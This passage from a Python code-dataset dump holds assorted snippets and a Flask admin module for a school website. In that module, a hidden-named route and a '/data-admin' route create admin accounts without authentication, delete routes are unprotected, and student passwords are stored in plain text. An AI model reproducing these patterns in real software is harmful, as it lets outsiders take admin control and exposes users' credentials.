Process(target=f,args=(lock,i)).start()\n","sub_path":"线程和进程/进程/04进程同步/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"57024016","text":"'''在control_1LAMOST.csv中的每条数据声明,对应G表的id'''\n\nimport pandas as pd\n\ndef main():\n csv_file = pd.read_csv('control_1LAMOST.csv')\n csv_t = pd.read_csv('../galpair_AB3_LAMOST_Av_info_class_mass.csv')\n\n csv_file['galpair_index'] = 0\n csv_file['class_my'] = -2\n csv_t['galpair_index'] =0\n for i in csv_file.index:\n csv_file.loc[i,'galpair_index'] = i + 770000\n csv_t.loc[i,'galpair_index'] = i + 770000\n csv_file.loc[i,'class_my'] = csv_t.loc[i,'class_my']\n\n csv_file.to_csv('control_1_LAMOST.csv', index=False)\n csv_t.to_csv('galpair_AB3_LAMOST_Av_info_class_mass_new.csv', index=False)\n\n print(csv_file)\n # csv_file.to_csv('control_1_LAMOST.csv', index=False)\n\nif __name__ == '__main__':\n main()","sub_path":"jzq/control/seek_index_classs.py","file_name":"seek_index_classs.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"249349525","text":"#encoding: utf-8\n\nsrcpath = 'www_access_20140823.log'\ndstpath = 'zz.log'\n\nsrchandler = open(srcpath, 'r')\ndsthandler = open(dstpath, 'w')\nsize = 1024\n\nwhile True:\n cxt = srchandler.read(size)\n if not cxt:\n break\n dsthandler.write(cxt)\n\ndsthandler.close()\nsrchandler.close()","sub_path":"03/zhoufucheng/copyfile.py","file_name":"copyfile.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"533005035","text":"import threading\nimport time\n\"\"\"通过集成的方式去继承方式去实现进程\"\"\"\n\n\n\"\"\"重写进程函数\"\"\"\nclass Mythread(threading.Thread):\n def __init__(self,num):\n threading.Thread.__init__(self)\n self.num=num\n def run(self):\n print(\"runing on number:%s\",self.num)\n time.sleep(10)\n\n\n\n\nif __name__==\"__main__\":\n t1=Mythread(1)\n t2=Mythread(2)\n t1.start() # 执行start就是我们进程类中的run方法\n t2.start()\n","sub_path":"thread/创建进程.py","file_name":"创建进程.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"373983496","text":"\"\"\"\nCopyright (c) 2018 Red Hat, Inc\nAll rights reserved.\n\nThis software may be modified and distributed under the terms\nof the BSD license. See the LICENSE file for details.\n\nVery small subset of tests for the YumRepo class. Most testing\nis done in test_add_yum_repo_by_url\n\"\"\"\nfrom fnmatch import fnmatch\nimport sys\nfrom atomic_reactor.yum_util import YumRepo\nimport pytest\n\n\n@pytest.mark.parametrize(('repourl', 'add_hash', 'pattern'), (\n ('http://example.com/a/b/c/myrepo.repo', True, 'myrepo-?????.repo'),\n ('http://example.com/a/b/c/myrepo', True, 'myrepo-?????.repo'),\n ('http://example.com/repo-2.repo', True, 'repo-2-?????.repo'),\n ('http://example.com/repo-2', True, 'repo-2-?????.repo'),\n ('http://example.com/spam/myrepo.repo', True, 'myrepo-?????.repo'),\n ('http://example.com/bacon/myrepo', True, 'myrepo-?????.repo'),\n ('http://example.com/spam/myrepo-608de.repo', False, 'myrepo-?????.repo'),\n))\ndef test_add_repo_to_url(repourl, add_hash, pattern):\n repo = YumRepo(repourl, add_hash=add_hash)\n assert repo.repourl == repourl\n assert fnmatch(repo.filename, pattern)\n\n\ndef test_invalid_config():\n repo = YumRepo('http://example.com/a/b/c/myrepo.repo', 'line noise')\n if (sys.version_info < (3, 0)):\n assert not repo.is_valid()\n else:\n assert True\n","sub_path":"tests/test_yum_util.py","file_name":"test_yum_util.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"456590892","text":"\nfrom flask import Flask, Blueprint,flash, render_template, url_for, redirect, request\nfrom albina import db, bcrypt\nfrom albina import app\nfrom flask_wtf import file\nfrom wtforms import form\nfrom wtforms.validators import DataRequired\nfrom albina.dtbase import Dt_daftar,Dt_admin, Dt_profil,Dt_berita,Dt_program,Dt_kegiatan,Dt_galeri,Dt_sarana# Tabel bagian database\nfrom albina.admin.forms import updt_fadmin,dt_fberita, dt_fgaleri,dt_fkegiatan, dt_fprofil,dt_fprogram, login_fadmin,upt_berita,upt_profil,upt_kegiatan,upt_galeri,upt_program,upt_sarana, dt_fsarana, dt_fdaftar , dftr_fadmin # data dari forms\nfrom flask_login import login_user, current_user, logout_user, login_required\nfrom PIL import Image\nimport os\nimport secrets\n\nbadmin= Blueprint('badmin',__name__)\n\n#simpan foto\ndef simpan_gambar(form_gmbr):\n random_hex= secrets.token_hex(8)\n f_name, f_ext= os.path.splitext(form_gmbr.filename)\n foto_fn= random_hex + f_ext\n foto_path= os.path.join(app.root_path, 'albina/static/gambar', foto_fn)\n ubah_size=(300,300)\n j=Image.open(form_gmbr)\n j.thumbnail(ubah_size)\n j.save(foto_path)\n #form_foto.save(foto_path)\n return foto_fn\n\n#simpan surat\n\n\n@badmin.route(\"/dashboard\", methods=['GET','POST'])\ndef dasboard():\n return render_template(\"admin/dashboard.html\")\n\n@badmin.route(\"/jalan-tikus-jangan-lewat\", methods=['GET','POST'])\ndef akun():\n form=dftr_fadmin()\n if form.validate_on_submit():\n file_gambar=simpan_gambar(form.gmbr.data)\n pass_hash=bcrypt.generate_password_hash(form.password.data).decode('UTF-8')\n dataadmin=Dt_admin(nip=form.nip.data, password=pass_hash, nama=form.nama.data, gmbr=file_gambar)\n db.session.add(dataadmin)\n db.session.commit()\n return redirect(url_for('badmin.dasboard'))\n return render_template(\"admin/akun.html\", form=form)\n\n \n@badmin.route(\"/data-admin\", methods=['GET','POST'])\ndef admin(): \n form=dftr_fadmin()\n if form.validate_on_submit():\n file_gambar=simpan_gambar(form.gmbr.data)\n pass_hash=bcrypt.generate_password_hash(form.password.data).decode('UTF-8')\n dataadmin=Dt_admin(nip=form.nip.data, password=pass_hash, nama=form.nama.data, gmbr=file_gambar)\n db.session.add(dataadmin)\n db.session.commit()\n return redirect(url_for('badmin.dasboard'))\n return render_template(\"admin/admin.html\", form=form)\n\n\n@badmin.route(\"/login-admin\", methods=['GET','POST'])\ndef login_admin():\n if current_user.is_authenticated:\n return redirect(url_for('badmin.dasboard'))\n form=login_fadmin()\n if form.validate_on_submit():\n ceknip=Dt_admin.query.filter_by(nip=form.nip.data).first()\n if ceknip and bcrypt.check_password_hash(ceknip.password, form.password.data):\n login_user(ceknip)\n flash('Anda Berhasil Login!')\n return redirect(url_for('badmin.login_admin'))\n else:\n flash('login gagal')\n return render_template(\"admin/login.html\",form=form)\n\n\n@badmin.route(\"/update-admin\", methods=['GET', 'POST'])\ndef update_admin():\n form=updt_fadmin() \n if form.validate_on_submit():\n if form.gmbr.data:\n file_gambar=simpan_gambar(form.gmbr.data)\n current_user.foto = file_gambar\n pass_hash=bcrypt.generate_password_hash(form.password.data).decode('UTF-8')\n current_user.nip=form.nip.data\n current_user.nama=form.nama.data\n current_user.password=pass_hash\n db.session.commit()\n flash('Data Berhasil Di ubah','warning')\n return redirect(url_for('badmin.dasboard'))\n elif request.method==\"GET\":\n form.nip.data= current_user.nip\n form.nama.data=current_user.nama\n form.password.data=current_user.password\n return render_template('admin/uptadmin.html', form=form)\n\n@badmin.route(\"/akun-admin\")\n@login_required\ndef akunadmin():\n return render_template(\"admin/akunadmin.html\")\n\n\n############ profile sekolah #############\n\n@badmin.route(\"/profil-sekolah\", methods=['GET','POST'])\ndef profil():\n form=dt_fprofil()\n dataprofil=Dt_profil.query.all()\n if form.validate_on_submit():\n add= Dt_profil(profil=form.profil.data, visi=form.visi.data, misi=form.misi.data)\n db.session.add(add)\n db.session.commit()\n flash('Data Berhasil Di Tambah','primary')\n return redirect(url_for('badmin.profil'))\n return render_template (\"admin/profil.html\", dataprofil=dataprofil, form=form)\n\n\n@badmin.route(\"/update-profil//update\", methods=['GET', 'POST'])\ndef update_profil(ed_id):\n dataprofil=Dt_profil.query.get_or_404(ed_id)\n form=upt_profil()\n if form.validate_on_submit():\n dataprofil.profil=form.profil.data\n dataprofil.visi=form.visi.data\n dataprofil.misi=form.misi.data\n db.session.commit()\n flash('Data Berhasil Di ubah','warning')\n return redirect(url_for('badmin.profil'))\n elif request.method==\"GET\":\n form.profil.data=dataprofil.profil\n form.visi.data=dataprofil.visi\n form.misi.data=dataprofil.misi\n return render_template('admin/uptprofil.html', form=form)\n\n@badmin.route(\"/hapus-profil/\", methods=['GET', 'POST'])\ndef hapus_profil(id):\n qprofil=Dt_profil.query.get(id)\n db.session.delete(qprofil)\n db.session.commit()\n return redirect(url_for('badmin.berita'))\n###############################################\n\n###### program sekolah #################\n\n@badmin.route(\"/program-sekolah\", methods=['GET','POST'], defaults={\"page\": 1})\n@badmin.route(\"/program-sekolah/\", methods=['GET', 'POST'])\n\ndef program(page):\n page=page\n pages=2\n form=dt_fprogram()\n dataprogram=Dt_program.query.all()\n dataprogram = Dt_program.query.order_by(Dt_program.id.asc()).paginate(page, pages, error_out=False)\n if request.method == 'POST' and 'tag' in request.form:\n tag = request.form[\"tag\"]\n search = \"%{}%\".format(tag)\n dataprogram = Dt_program.query.filter(Dt_program.program.like(search)).paginate(page, pages, error_out=False)\n return render_template(\"admin/program.html\", dataprogram=dataprogram, form=form, tag=tag)\n if form.validate_on_submit():\n file_gambar=simpan_gambar(form.gmbr.data)\n add= Dt_program(program=form.program.data,ket=form.ket.data, gmbr=file_gambar)\n db.session.add(add)\n db.session.commit()\n flash('Data Berhasil Di Tambah','primary')\n return redirect(url_for('badmin.program'))\n return render_template (\"admin/program.html\", dataprogram=dataprogram, form=form)\n\n@badmin.route(\"/update-program//update\", methods=['GET', 'POST'])\ndef update_program(ed_id):\n dataprogram=Dt_program.query.get_or_404(ed_id)\n form=upt_program()\n if form.validate_on_submit():\n if form.gmbr.data:\n file_gambar=simpan_gambar(form.gmbr.data)\n form.foto = file_gambar\n dataprogram.program=form.program.data\n dataprogram.gmbr=file_gambar\n dataprogram.ket=form.ket.data\n db.session.commit()\n return redirect(url_for('badmin.program'))\n elif request.method==\"GET\":\n form.program.data=dataprogram.program\n form.ket.data=dataprogram.ket\n return render_template('admin/uptprogram.html', form=form)\n\n@badmin.route(\"/hapus-program/\", methods=['GET', 'POST'])\ndef hapus_program(id):\n qprogram=Dt_program.query.get(id)\n db.session.delete(qprogram)\n db.session.commit()\n return redirect(url_for('badmin.program')) \n############################################\n\n############## kegiatan siswa ####################\n\n@badmin.route(\"/kegiatan-sekolah\", methods=['GET','POST'], defaults={\"page\": 1})\n@badmin.route(\"/kegiatan-sekolah/\", methods=['GET', 'POST'])\ndef kegiatan(page):\n page=page\n pages=2\n form=dt_fkegiatan()\n datakegiatan=Dt_kegiatan.query.all()\n datakegiatan = Dt_kegiatan.query.order_by(Dt_kegiatan.id.asc ()).paginate(page, pages, error_out=False)\n if request.method == 'POST' and 'tag' in request.form:\n tag = request.form[\"tag\"]\n search = \"%{}%\".format(tag)\n datakegiatan = Dt_kegiatan.query.filter(Dt_kegiatan.kegiatan.like(search)).paginate(page, pages, error_out=False)\n return render_template(\"admin/kegiatan.html\", datakegiatan=datakegiatan, form=form, tag=tag)\n if form.validate_on_submit():\n file_gambar=simpan_gambar(form.gmbr.data)\n add= Dt_kegiatan(kegiatan=form.kegiatan.data,ket=form.ket.data, gmbr=file_gambar)\n db.session.add(add)\n db.session.commit()\n flash('Data Berhasil Di Tambah','primary')\n return redirect(url_for('badmin.kegiatan'))\n return render_template (\"admin/kegiatan.html\", datakegiatan=datakegiatan, form=form)\n\n\n@badmin.route(\"/update-kegiatan//update\", methods=['GET', 'POST'])\ndef update_kegiatan(ed_id):\n datakegiatan=Dt_kegiatan.query.get_or_404(ed_id)\n form=upt_kegiatan()\n if form.validate_on_submit():\n if form.gmbr.data:\n file_gambar=simpan_gambar(form.gmbr.data)\n form.foto = file_gambar\n datakegiatan.kegiatan=form.kegiatan.data\n datakegiatan.gmbr=file_gambar\n datakegiatan.ket=form.ket.data\n db.session.commit()\n flash('Data Berhasil Di ubah','warning')\n return redirect(url_for('badmin.kegiatan'))\n elif request.method==\"GET\":\n form.kegiatan.data=datakegiatan.kegiatan\n form.ket.data=datakegiatan.ket\n return render_template('admin/uptkegiatan.html', form=form)\n\n@badmin.route(\"/hapus-kegiatan/\", methods=['GET', 'POST'])\ndef hapus_kegiatan(id):\n qkegiatan=Dt_kegiatan.query.get(id)\n db.session.delete(qkegiatan)\n db.session.commit()\n return redirect(url_for('badmin.profil'))\n##############################################\n\n############# Sarana Prasarana ############\n\n@badmin.route(\"/sarana-sekolah\", methods=['GET','POST'], defaults={\"page\": 1})\n@badmin.route(\"/sarana-sekolah/\", methods=['GET', 'POST'])\n@login_required\ndef sarana(page):\n page=page\n pages=2\n form=dt_fsarana()\n datasarana=Dt_sarana.query.all()\n datasarana = Dt_sarana.query.order_by(Dt_sarana.id.asc ()).paginate(page, pages, error_out=False)\n if request.method == 'POST' and 'tag' in request.form:\n tag = request.form[\"tag\"]\n search = \"%{}%\".format(tag)\n datasarana = Dt_sarana.query.filter(Dt_sarana.sarana.like(search)).paginate(page, pages, error_out=False)\n return render_template(\"admin/sarana.html\", datasarana=datasarana, form=form, tag=tag)\n if form.validate_on_submit():\n file_gambar=simpan_gambar(form.gmbr.data)\n add= Dt_sarana(sarana=form.sarana.data,ket=form.ket.data, gmbr=file_gambar)\n db.session.add(add)\n db.session.commit()\n flash('Data Berhasil Di Tambah','primary')\n return redirect(url_for('badmin.sarana'))\n return render_template (\"admin/sarana.html\", datasarana=datasarana, form=form)\n \n@badmin.route(\"/update-sarana//update\", methods=['GET', 'POST'])\ndef update_sarana(ed_id):\n datasarana=Dt_sarana.query.get_or_404(ed_id)\n form=upt_sarana()\n if form.validate_on_submit():\n if form.gmbr.data:\n file_gambar=simpan_gambar(form.gmbr.data)\n form.foto = file_gambar\n datasarana.sarana=form.sarana.data\n datasarana.ket=form.ket.data\n datasarana.gmbr=file_gambar\n db.session.commit()\n flash('Data Berhasil Di ubah','warning')\n return redirect(url_for('badmin.sarana'))\n elif request.method==\"GET\":\n form.sarana.data=datasarana.sarana\n form.ket.data=datasarana.ket\n return render_template('admin/uptsarana.html', form=form)\n\n@badmin.route(\"/hapus-sarana/\", methods=['GET', 'POST'])\ndef hapus_sarana(id):\n qsarana=Dt_sarana.query.get(id)\n db.session.delete(qsarana)\n db.session.commit()\n return redirect(url_for('badmin.sarana'))\n\n\n########### Berita ##############\n@badmin.route(\"/berita-sekolah\", methods=['GET','POST'], defaults={\"page\": 1})\n@badmin.route(\"/berita-sekolah/\", methods=['GET', 'POST'])\n@login_required\ndef berita(page):\n page=page\n pages=2\n form=dt_fberita()\n databerita=Dt_berita.query.all()\n databerita = Dt_berita.query.order_by(Dt_berita.id.asc ()).paginate(page, pages, error_out=False)\n if request.method == 'POST' and 'tag' in request.form:\n tag = request.form[\"tag\"]\n search = \"%{}%\".format(tag)\n databerita = Dt_berita.query.filter(Dt_berita.berita.like(search)).paginate(page, pages, error_out=False)\n return render_template(\"admin/berita.html\", databerita=databerita, form=form, tag=tag)\n if form.validate_on_submit():\n file_gambar=simpan_gambar(form.gmbr.data)\n add= Dt_berita(berita=form.berita.data,ket=form.ket.data, gmbr=file_gambar)\n db.session.add(add)\n db.session.commit()\n flash('Data Berhasil Di Tambah','primary')\n return redirect(url_for('badmin.berita'))\n return render_template (\"admin/berita.html\", databerita=databerita, form=form)\n\n@badmin.route(\"/profil-admin\")\ndef profiladmin():\n dataadmin=Dt_admin.query.all()\n return render_template (\"admin/dtladmin.html\", dataadmin=dataadmin)\n\n@badmin.route(\"/update-berita//update\", methods=['GET', 'POST'])\ndef update_berita(ed_id):\n databerita=Dt_berita.query.get_or_404(ed_id)\n form=upt_berita()\n if form.validate_on_submit():\n if form.gmbr.data:\n file_gambar=simpan_gambar(form.gmbr.data)\n form.foto = file_gambar\n databerita.berita=form.berita.data\n databerita.ket=form.ket.data\n databerita.gmbr=file_gambar\n db.session.commit()\n flash('Data Berhasil Di ubah','warning')\n return redirect(url_for('badmin.berita'))\n elif request.method==\"GET\":\n form.berita.data=databerita.berita\n form.ket.data=databerita.ket\n return render_template('admin/uptberita.html', form=form)\n\n@badmin.route(\"/hapus-berita/\", methods=['GET', 'POST'])\ndef hapus_berita(id):\n qberita=Dt_berita.query.get(id)\n db.session.delete(qberita)\n db.session.commit()\n return redirect(url_for('badmin.berita'))\n\n\n\n\n######### Galeri ###########\n@badmin.route(\"/galeri-sekolah\", methods=['GET','POST'], defaults={\"page\": 1})\n@badmin.route(\"/galeri-sekolah/\", methods=['GET', 'POST'])\ndef galeri(page):\n page=page\n pages=2\n form=dt_fgaleri()\n datagaleri=Dt_galeri.query.all()\n datagaleri = Dt_galeri.query.order_by(Dt_galeri.id.asc ()).paginate(page, pages, error_out=False)\n if request.method == 'POST' and 'tag' in request.form:\n tag = request.form[\"tag\"]\n search = \"%{}%\".format(tag)\n datagaleri = Dt_galeri.query.filter(Dt_galeri.ket.like(search)).paginate(page, pages, error_out=False)\n return render_template(\"admin/galeri.html\", datagaleri=datagaleri, form=form, tag=tag)\n if form.validate_on_submit():\n file_gambar=simpan_gambar(form.gmbr.data)\n add= Dt_galeri(ket=form.ket.data, gmbr=file_gambar)\n db.session.add(add)\n db.session.commit()\n flash('Data Berhasil Di Tambah','primary')\n return redirect(url_for('badmin.galeri'))\n return render_template (\"admin/galeri.html\", datagaleri=datagaleri, form=form)\n\n\n@badmin.route(\"/update-galeri//update\", methods=['GET', 'POST'])\ndef update_galeri(ed_id):\n datagaleri=Dt_galeri.query.get_or_404(ed_id)\n form=upt_galeri()\n if form.validate_on_submit():\n if form.gmbr.data:\n file_gambar=simpan_gambar(form.gmbr.data)\n form.foto = file_gambar\n datagaleri.gmbr=file_gambar\n datagaleri.ket=form.ket.data\n db.session.commit()\n flash('Data Berhasil Di ubah','warning')\n return redirect(url_for('badmin.galeri'))\n elif request.method==\"GET\":\n form.ket.data=datagaleri.ket\n return render_template('admin/uptgaleri.html', form=form)\n\n@badmin.route(\"/hapus-galeri/\", methods=['GET', 'POST'])\ndef hapus_galeri(id):\n qgaleri=Dt_galeri.query.get(id)\n db.session.delete(qgaleri)\n db.session.commit()\n return redirect(url_for('badmin.galeri'))\n\n\n####################\n\n\n\n##### pendaftaran siswa lewat admin ##########\n@badmin.route(\"/data/siswa-baru\", methods=['GET','POST'], defaults={\"hal\": 1})\n@badmin.route(\"/\", methods=['GET', 'POST'])\ndef siswa1(hal):\n hal=hal\n hals=10\n form=dt_fdaftar()\n datasiswa=Dt_daftar.query.all()\n datasiswa = Dt_daftar.query.order_by(Dt_daftar.id.asc ()).paginate(hal, hals, error_out=False)\n if request.method == 'POST' and 'tag' in request.form:\n tag = request.form[\"tag\"]\n search = \"%{}%\".format(tag)\n datasiswa = Dt_daftar.query.filter(Dt_daftar.tag.like(search)).paginate(hal, hals, error_out=False)\n return render_template(\"admin/siswabaru.html\", datasiswa=datasiswa, tag=tag)\n if form.validate_on_submit():\n file_gambar=simpan_gambar(form.gmbr.data)\n add= Dt_daftar(niss=form.niss.data, nm_siswa=form.nm_siswa.data, tmpt_lhr =form.tmpt_lhr.data, tgl_lhr=form.tgl_lhr.data, jk=form.jk.data, almt_siswa=form.almt_siswa.data, agama=form.agama.data, nm_ortu=form.nm_ortu.data, telp_ortu=form.telp_ortu.data,password=form.password.data, gmbr=file_gambar )\n db.session.add(add)\n db.session.commit()\n flash('Data Berhasil Di Tambah','primary')\n return redirect(url_for('badmin.siswa1'))\n return render_template (\"admin/siswabaru.html\", datasiswa=datasiswa, form=form)\n\n#@badmin.route(\"/update-siswa//update\", methods=['GET', 'POST'])\n#def update_siswa(ed_id):\n datasiswa=Dt_daftar.query.get_or_404(ed_id)\n form=upt_siswa()\n if form.validate_on_submit():\n if form.gmbr.data:\n file_gambar=simpan_gambar(form.gmbr.data)\n form.foto = file_gambar\n pass_hash=bcrypt.generate_password_hash(form.password.data).decode('UTF-8')\n datasiswa.niss=form.niss\n datasiswa.nm_siswa=form.nm_siswa\n datasiswa.tmpt_lhr =form.tmpt_lhr \n datasiswa.tgl_lhr=form.tgl_lhr\n datasiswa.almt_siswa=form.almt_siswa\n datasiswa.agama=form.agama\n datasiswa.nm_ortu=form.nm_ortu\n datasiswa.telp_ortu=form.telp_ortu\n datasiswa.password=pass_hash\n datasiswa.gmbr=file_gambar\n db.session.commit()\n flash('Data Berhasil Di ubah','warning')\n return redirect(url_for('badmin.siswa'))\n #elif request.method==\"GET\":\n form.niss=datasiswa.niss\n form.nm_siswa=datasiswa.nm_siswa\n form.tmpt_lhr=datasiswa.tmpt_lhr \n form.tgl_lhr=datasiswa.tgl_lhr\n form.jk=datasiswa.jk\n form.almt_siswa=datasiswa.almt_siswa\n form.agama=datasiswa.agama\n form.nm_ortu=datasiswa.nm_ortu\n form.telp_ortu=datasiswa.telp_ortu\n form.password.data=current_user.password\n #return render_template('admin/uptsiswa.html', form=form)\n\n\n@badmin.route(\"/hapus-siswa/\", methods=['GET', 'POST'])\ndef hapus_siswa(id):\n qsiswa=Dt_daftar.query.get(id)\n db.session.delete(qsiswa)\n db.session.commit()\n return redirect(url_for('badmin.siswa')) \n\n@badmin.route(\"/logout-admin\")\ndef logoutadmin(): \n logout_user()\n return redirect(url_for('badmin.login_admin'))\n\n\n \n\n\n\n\n\n","sub_path":"albina/admin/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":19335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"594964147","text":"class Node:\n def __init__(self,data):\n self.data = data\n self.next = None\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\ndef traversal(head):\n p = head\n data = []\n data.append(p.data)\n while p is not None:\n print(p.data)\n if p.next.data not in data:\n data.append(p.next.data)\n else:\n p.next = None\n break\n\n p = p.next\n print(data)\n\nif __name__=='__main__':\n linklist = LinkedList()\n\n linklist.head = Node(1)\n two = Node(2)\n three = Node(3)\n four = Node(4)\n five = Node(5)\n\n linklist.head.next = two\n two.next = three\n three.next = four\n four.next = five\n five.next = two\n\n traversal(linklist.head)","sub_path":"LinkedList/DetectAndRemoLoop.py","file_name":"DetectAndRemoLoop.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"19676915","text":"#fibonacci number\r\n# 1, 1, 2, 3, 5, 8...\r\n#fn = fn - 1 + fn - 2\r\n#where F0 = 0 F1 = 1\r\n#print(fib(3))\r\n#list : result = fib(2) + fib(1)\r\n# 1st : result = fib(2) + fib(1) : 2 + 1 = 3\r\n# 2nd : result = (fib(1)) + (fib(0)) + (fib(0)) : 1 + 0 = 1\r\ndef fib(n):\r\n if n == 0:\r\n return 0\r\n elif n == 1:\r\n return 1\r\n else:\r\n result = fib(n - 1) + fib(n -2)\r\n return result\r\n#as how many nos. they want\r\nnumFibValues = int(input(\"how much values should be found\"))\r\n#loop while calling for each number\r\ni = 1\r\nwhile i < numFibValues:\r\n fibValue = fib(i)\r\n print(fibValue)\r\n i += 1\r\nprint(\"all done\")\r\n","sub_path":"fibo.py","file_name":"fibo.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"217509174","text":"import torch \nimport torch.nn as nn\nfrom collections import OrderedDict\nimport torch.nn.functional as F\nimport numpy as np\nimport logging\nimport importlib\nimport sys\nfrom torch_relay_build import torch_relay_func\nfrom torch_func_modifier import func_modifier\nformatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\n\n'''Calculate Latency Overhead from csv file'''\ndef csv_to_time_overhead(csv_file):\n df = pd.read_csv(csv_file, skiprows=2)\n # df = df.drop_duplicates(subset=['ID'])\n # print(df)\n trace_df = df[df['Metric Name'] == \"Cycles\"]\n trace_df= trace_df.replace(',','', regex=True)\n trace_df['Metric Value'] = pd.to_numeric(trace_df['Metric Value'])\n cost = trace_df['Metric Value'].sum()\n return cost\n\n'''Decode a sequence prediction'''\ndef reverse_map(label_file, layer_int_to_name_map):\n label_array = np.load(label_file)\n\n str_decoded = ''\n for x in label_array:\n if x in layer_int_to_name_map:\n str_decoded = str_decoded + layer_int_to_name_map[x] + ' '\n else:\n print(\"x=%d MAJOR ERROR? OUT OF PREDICTION SCOPE\" % x)\n return str_decoded\n\n'''Modify the saved model parameters, this is necessary for a trained model in practice'''\ndef modify_state_dict(model_file, state_dict, modify_list, widen_list, decompo_list, deepen_list, skipcon_list, kerneladd_list):\n j = -1\n # print(\"modify the state_dict to apply decomposition\")\n with open(\"./model_file/\" + model_file, \"r\") as in_file:\n buf = in_file.readlines()\n for i in range(len(modify_list)):\n if \"conv\" in modify_list[i]: # assume all conv layer use \"conv + digit\" as layer name. such as conv1, conv8\n j += 1\n conv_name = \"conv\" + modify_list[i].split(\"v\")[1]\n if_bias = next((False for line in buf if (\"self.{} = \".format(conv_name) in line and \"False\" in line and \"torch.nn.\" in line)), True)\n '''Modify kerneladd_list (conv)'''\n if kerneladd_list[j] > 0: #kernel_size\n orig_weight = state_dict[\"{}.weight\".format(conv_name)]\n state_dict['{}.weight'.format(conv_name)] = F.pad(input=orig_weight, pad=(kerneladd_list[j], kerneladd_list[j], kerneladd_list[j], kerneladd_list[j], 0, 0, 0, 0), mode='constant', value=0.0)\n '''Modify widen_list (conv)'''\n if (widen_list[j] > 1) and (j < len(kerneladd_list) - 1): #layer_widening, do not do to the last conv layer\n orig_weight = state_dict[\"{}.weight\".format(conv_name)]\n orig_shape = orig_weight.size()\n if if_bias:\n orig_bias = state_dict[\"{}.bias\".format(conv_name)]\n bn_name = \"conv_bn\" + modify_list[i].split(\"v\")[1]\n next_conv_name = \"conv\" + str(int(modify_list[i].split(\"v\")[1]) + 1)\n orig_next_weight = state_dict['{}.weight'.format(next_conv_name)]\n\n extra_c = int(np.floor(orig_shape[0] *(widen_list[j] - np.floor(widen_list[j]))/4)*4) # get float part\n mul_factor = int(np.floor(widen_list[j])) # get int\n state_dict['{}.weight'.format(conv_name)] = torch.cat([orig_weight[:extra_c, :, :, :].repeat_interleave(mul_factor+1,0), orig_weight[extra_c:, :, :, :].repeat_interleave(mul_factor,0)], 0)\n if if_bias:\n state_dict['{}.bias'.format(conv_name)] = torch.cat([orig_bias[:extra_c].repeat_interleave(mul_factor+1,0), orig_bias[extra_c:].repeat_interleave(mul_factor,0)], 0)\n result = next((True for line in buf if bn_name in line), False)\n if result:\n orig_bn_weight = state_dict['{}.weight'.format(bn_name)]\n orig_bn_bias = state_dict['{}.bias'.format(bn_name)]\n orig_bn_running_mean = state_dict['{}.running_mean'.format(bn_name)]\n orig_bn_running_var = state_dict['{}.running_var'.format(bn_name)]\n state_dict['{}.weight'.format(bn_name)] = torch.cat([orig_bn_weight[:extra_c].repeat_interleave(mul_factor+1,0), orig_bn_weight[extra_c:].repeat_interleave(mul_factor,0)], 0)\n state_dict['{}.bias'.format(bn_name)] = torch.cat([orig_bn_bias[:extra_c].repeat_interleave(mul_factor+1,0), orig_bn_bias[extra_c:].repeat_interleave(mul_factor,0)], 0)\n state_dict['{}.running_mean'.format(bn_name)] = torch.cat([orig_bn_running_mean[:extra_c].repeat_interleave(mul_factor+1,0), orig_bn_running_mean[extra_c:].repeat_interleave(mul_factor,0)], 0)\n state_dict['{}.running_var'.format(bn_name)] = torch.cat([orig_bn_running_var[:extra_c].repeat_interleave(mul_factor+1,0), orig_bn_running_var[extra_c:].repeat_interleave(mul_factor,0)], 0)\n state_dict['{}.weight'.format(next_conv_name)] = torch.cat([orig_next_weight[:, :extra_c, :, :].repeat_interleave(mul_factor+1,1)/(mul_factor+1), orig_next_weight[:, extra_c:, :, :].repeat_interleave(mul_factor,1)/mul_factor], 1)\n\n '''Modify deepen_list (conv)'''\n if deepen_list[j] == 1: #layer_deepening\n state_dict['{}_dp.weight'.format(conv_name)] = torch.eye(state_dict['{}.weight'.format(conv_name)].size()[0]).unsqueeze(2).unsqueeze(3)\n if if_bias:\n state_dict['{}_dp.bias'.format(conv_name)] = torch.zeros_like(state_dict['{}.bias'.format(conv_name)])\n else:\n state_dict['{}_dp.bias'.format(conv_name)] = torch.zeros([state_dict['{}_dp.weight'.format(conv_name)].size()[1]])\n\n '''Modify skipcon_list (conv)'''\n if skipcon_list[j] == 1: #skip_connection\n orig_weight_shape = state_dict[\"{}.weight\".format(conv_name)].size()\n state_dict['{}_sk.weight'.format(conv_name)] = torch.zeros([orig_weight_shape[0], orig_weight_shape[0], orig_weight_shape[2], orig_weight_shape[3]])\n if if_bias:\n state_dict['{}_sk.bias'.format(conv_name)] = torch.zeros_like(state_dict['{}.bias'.format(conv_name)])\n else:\n state_dict['{}_sk.bias'.format(conv_name)] = torch.zeros([orig_weight_shape[0]])\n '''Modify decompo_list (conv)'''\n orig_weight = state_dict[\"{}.weight\".format(conv_name)]\n orig_shape = orig_weight.size()\n if if_bias:\n orig_bias = state_dict[\"{}.bias\".format(conv_name)]\n state_dict.pop(\"{}.weight\".format(conv_name), None)\n state_dict.pop(\"{}.bias\".format(conv_name), None)\n disable_decompo = next((True for line in buf if \"self.decompo_list[{}] = 0\".format(j) in line), False)\n if decompo_list[j] == 0 or decompo_list[j] > 4 or disable_decompo:\n state_dict[\"{}.weight\".format(conv_name)] = orig_weight\n if if_bias:\n 